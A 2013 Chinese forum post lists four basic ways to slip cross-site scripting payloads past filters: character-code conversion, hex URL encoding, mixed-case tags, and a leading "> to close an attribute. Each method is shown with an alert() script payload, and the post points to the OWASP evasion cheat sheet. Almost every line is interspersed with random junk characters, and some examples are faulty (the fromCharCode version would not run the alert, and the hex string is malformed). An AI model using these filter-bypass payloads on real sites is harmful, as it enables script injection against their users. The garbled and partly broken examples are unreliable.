四种超级基础的绕过方法。1 k2 K( w3 ~/ y# H" w
1.转换为ASCII码- G# g: o, h& N. @
例子:原脚本为<script>alert(‘I love F4ck’)</script >6 U) G5 r7 E6 Z( x1 U4 n0 N2 d
通过转换,变成:
5 _. e. D& e9 A" `6 C; l. X) Z<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>* |# R! [* }6 y' y9 p
% A. w- T: T4 S; ?& a2.转换为HEX(十六进制)
W( n5 F- X# N3 _2 D+ m例子:原脚本为<script>alert(‘I love F4ck’)</script>
" ~# C0 g; [" b( \9 j+ l. Q. e通过转换,变成:
# r0 R" u2 U9 J1 g, m. {%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e' y/ u0 Q6 Y5 S5 s
5 c3 n' P9 Y) C; _: M0 F+ N i R3.转换脚本的大小写4 }7 A; m1 [" U
例子:原脚本为<script>alert(‘I love F4ck’)</script>
6 g/ G# e# H) t& v* `转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>2 `* T) j; a6 U8 I
, v, Q$ M* W ?: I# e, h/ P; Y
4.增加闭合标记”>
+ V5 V9 K3 ?0 W3 R, X# E例子:原脚本为<script>alert(‘I love F4ck’)</script>9 l/ Q8 r3 n0 L3 A ?+ Q8 x
转换为:”><script>alert(‘I love F4ck’)</script>
* X7 D- y; ~/ S/ o& k3 o更详细绕过技术请参考此网页
1 A8 r; x; s+ [0 Q" g& H6 V. Nhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet$ i M( ?& x4 o
5 R7 h1 r! D9 @+ J
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对